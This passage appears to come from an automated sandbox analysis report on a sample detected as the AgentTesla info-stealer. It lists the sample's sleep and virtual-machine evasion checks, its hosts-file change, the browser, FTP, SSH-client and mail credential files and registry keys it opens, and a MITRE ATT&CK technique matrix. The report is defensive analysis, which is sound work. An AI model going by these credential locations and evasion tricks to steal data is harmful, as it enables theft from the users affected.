                  Source: C:\Users\user\Desktop\file.exe TID: 5716 | Thread sleep time: -3180000s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 5716 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 1556 | Thread sleep count: 133 > 30
                  Source: C:\Users\user\Desktop\file.exe TID: 1556 | Thread sleep time: -66500s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 5716 | Thread sleep time: -57158s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 5716 | Thread sleep time: -56970s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\file.exe | Last function: Thread delayed
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_05992EF6 GetSystemInfo, 0_2_05992EF6
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD2DA0 LdrInitializeThunk, 0_2_00DD2DA0
                  Source: C:\Users\user\Desktop\file.exe | Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\file.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  Modifies the hosts file
                  Source: C:\Users\user\Desktop\file.exe | File written: C:\Windows\System32\drivers\etc\hosts
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmp | Binary or memory string: Progman
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings:

                  Modifies the hosts file
                  Source: C:\Users\user\Desktop\file.exe | File written: C:\Windows\System32\drivers\etc\hosts

                  Stealing of Sensitive Information:

                  Yara detected AgentTesla
                  Source: Yara match | File source: file.exe, type: SAMPLE
                  Source: Yara match | File source: 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.228406188.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: file.exe PID: 5448, type: MEMORY
                  Source: Yara match | File source: 0.2.file.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Tries to steal Mail credentials (via file access)
                  Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: Yara match | File source: 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: file.exe PID: 5448, type: MEMORY

                  Remote Access Functionality:

                  Yara detected AgentTesla
                  Source: Yara match | File source: file.exe, type: SAMPLE
                  Source: Yara match | File source: 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.228406188.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: file.exe PID: 5448, type: MEMORY
                  Source: Yara match | File source: 0.2.file.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.8d0000.0.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Access Token Manipulation 1 | Masquerading 1 | OS Credential Dumping 2 | Query Registry 1 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 1 | File and Directory Permissions Modification 1 | Input Capture 11 | Security Software Discovery 111 | Remote Desktop Protocol | Input Capture 11 | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 13 | Credentials in Registry 1 | Virtualization/Sandbox Evasion 13 | SMB/Windows Admin Shares | Archive Collected Data 11 | Automated Exfiltration | Application Layer Protocol 11 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Data from Local System 2 | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                  Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Access Token Manipulation 1 | LSA Secrets | System Information Discovery 115 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | Deobfuscate/Decode Files or Information 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                  Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue